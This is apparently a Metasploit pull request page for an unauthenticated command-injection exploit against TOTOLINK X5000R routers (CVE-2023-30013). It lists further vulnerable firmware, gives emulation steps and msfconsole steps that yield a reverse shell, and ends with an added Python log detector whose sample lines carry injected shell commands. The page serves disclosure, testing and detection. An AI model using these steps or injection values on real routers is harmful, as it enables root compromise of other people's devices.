TOTOLINK X5000R Wireless GigaBit Router Unauthenticed RCE [CVE-2023-30013] #18365
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@msjenkins-r7 test this please
Thanks @h00die-gr3y for this module. I just left a few minor comments. Other than that, it looks good to me. I tested against X5000R_V9.1.0u.6118_B20201102 following your installation steps (great documentation BTW) and successfully got a session with both targets.
Thanks @h00die-gr3y for updating this. Everything looks good to me now. I tested against the firmware X5000R_V9.1.0u.6118_B20201102 running with FirmAE and verified I got a session using both targets. I'll go ahead and land it.
Release Notes
This adds an exploit module that leverages a command insertion vulnerability in TOTOLINK X5000R Wireless Gigabit Router firmware.

TOTOLINK X5000R Wireless Gigabit Router firmware X5000R_V9.1.0u.6118_B20201102 and X5000R_V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter. After exploitation, an attacker will have full access with the same user privileges under which the webserver is running (typically as user root, ;-). Read this article on attackerkb.com for more details.
Ideally, to test this module, you would need a TOTOLINK X5000R Wireless GigaBit Router. However, by downloading the firmware and installing and using FirmAE to emulate the router, we can simulate the router and test the vulnerable endpoint.

UPDATE 14 September 2023
I could not reproduce the exploit with X5000R firmware X5000R_V9.1.0u.6369_B20230113.rar, so please use V9.1.0u.6118_B20201102.zip for your testing. I have also discovered other TOTOLINK firmware that is vulnerable for the same exploit.

A7000R_V9.1.0u.6115_B20201022.zip
A3700R_V9.1.2u.6134_B20201202.zip
N200RE_V5_V9.3.5u.6095_B20200916.zip and N200RE_V5_V9.3.5u.6139_B20201216.zip
N350RT_V9.3.5u.6095_B20200916.zip and N350RT_V9.3.5u.6139_B20201216.zip
EX1200L_V9.3.5u.6146_B20201023.zip
This module has been tested on:
Installation steps to emulate the router firmware with FirmAE
1. Install FirmAE on your Linux distribution using the installation instructions provided here.
2. binwalk needs to be able to handle a sasquatch filesystem, which requires a bit of additional installation and compilation steps that you can find here. Please do not forget to run this after your FirmAE installation, otherwise you will not be able to extract the firmware.
3. Download the firmware X5000R_V9.1.0u.6118_B20201102.zip
4. Run ./init.sh to initialize and start the Postgres database.
5. Run ./run.sh -d TOTOLINK X5000R_V9.1.0u.6118_B20201102.zip
6. netcat can not connect on 192.168.0.1 and pinging this IP is also not working.
7. Connect to socat to access your running firmware and run the below commands to check the network configuration. eth2 instead of eth0, and br0 did not have any IP configured.
8. ping the network address 192.168.0.1 from your host and run an nmap command to check the services.

You are now ready to test the module using the emulated router hardware on IP address 192.168.0.1.
Verification
1. msfconsole
2. use exploit/linux/http/totolink_unauth_rce_cve_2023_30013
3. set rhosts <ip-target>
4. set rport <port>
5. set lhost <ip-attacker>
6. set target <0=Unix Command, 1=Linux Dropper>
7. exploit
8. you should get a reverse shell or Meterpreter
Scenarios
FirmAE X5000R Router Emulation Unix Command - cmd/unix/reverse_netcat_gaping
FirmAE X5000R Router Emulation Linux Dropper - linux/mipsle/meterpreter_reverse_tcp
Limitations
Staged mipsle payloads will core dump on the target, so use stage-less mipsle payloads when using the Linux Dropper target.
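On the detection side, the following Python script is an added example for this page (it is not code from this PR, from the Metasploit module, or from TOTOLINK). It scans constructed web-server log lines for requests to the setting/setTracerouteCfg endpoint named in the description whose "command" parameter is not a plain hostname or IP literal, which is the only shape a legitimate traceroute target should ever have. The one-line log format (client, method, path with optional query, body) is an assumption made for the example; nothing on this page says the router logs requests this way.

```python
"""Log-based detection of command-injection attempts against the
setting/setTracerouteCfg endpoint (CVE-2023-30013 pattern).

Added example; not code from the Metasploit module, the PR, or TOTOLINK.
Assumed log format (constructed for this example):
    <client-ip> <method> <path-with-optional-query> [<request body>]
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter named in the PR description.
VULN_PATH = "setting/setTracerouteCfg"
VULN_PARAM = "command"

# A traceroute target should only ever be a hostname or an IPv4/IPv6 literal.
# Anything outside this character set (whitespace, quotes, ; | & ` $ ( ) ...)
# is treated as an injection signal, instead of enumerating known payloads.
SAFE_TARGET = re.compile(r"[A-Za-z0-9.\-:]{1,253}")


def parse_body(body: str) -> dict:
    """Return parameters from a JSON-object body or a form-encoded body."""
    body = body.strip()
    if not body:
        return {}
    if body.startswith("{"):
        try:
            data = json.loads(body)
        except ValueError:
            return {}
        return {k: str(v) for k, v in data.items()} if isinstance(data, dict) else {}
    return {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}


def request_params(path: str, body: str) -> dict:
    """Merge query-string and body parameters; body values win on conflict."""
    query = urlsplit(path).query
    params = {k: v[-1] for k, v in parse_qs(query, keep_blank_values=True).items()}
    params.update(parse_body(body))
    return params


def is_suspicious_target(value: str) -> bool:
    """True unless the value is a plain hostname / IP literal."""
    return SAFE_TARGET.fullmatch(value) is None


def scan_log(lines) -> list:
    """Flag requests to the vulnerable endpoint whose "command" is not a plain target."""
    findings = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 3:
            continue  # not in the assumed format
        client, method, path = parts[:3]
        body = parts[3] if len(parts) == 4 else ""
        if VULN_PATH not in urlsplit(path).path:
            continue
        target = request_params(path, body).get(VULN_PARAM)
        if target is not None and is_suspicious_target(target):
            findings.append({"client": client, "method": method, "command": target})
    return findings


# Constructed sample log lines (not real captures).
SAMPLE_LOG = [
    # benign: traceroute to an IP, JSON body
    '192.168.0.10 POST /setting/setTracerouteCfg {"command":"8.8.8.8"}',
    # benign: traceroute to a hostname, form-encoded body
    '192.168.0.11 POST /setting/setTracerouteCfg command=example.com',
    # suspicious: shell separator appended to the target
    '203.0.113.7 POST /setting/setTracerouteCfg {"command":"1.1.1.1;echo injected"}',
    # suspicious: command substitution passed via the query string
    '203.0.113.8 GET /setting/setTracerouteCfg?command=%60echo%20x%60',
    # unrelated (hypothetical) endpoint: out of scope for this rule
    '192.168.0.12 POST /hypothetical/otherCfg {"command":"a | b"}',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The rule is deliberately an allow-list on the value rather than a block-list of metacharacters: a traceroute target that is not a hostname or address has no legitimate reason to exist, so the check stays valid regardless of how the injected string is encoded or which commands it carries. The same allow-list is what a firmware fix for this bug would apply before the value ever reaches a shell.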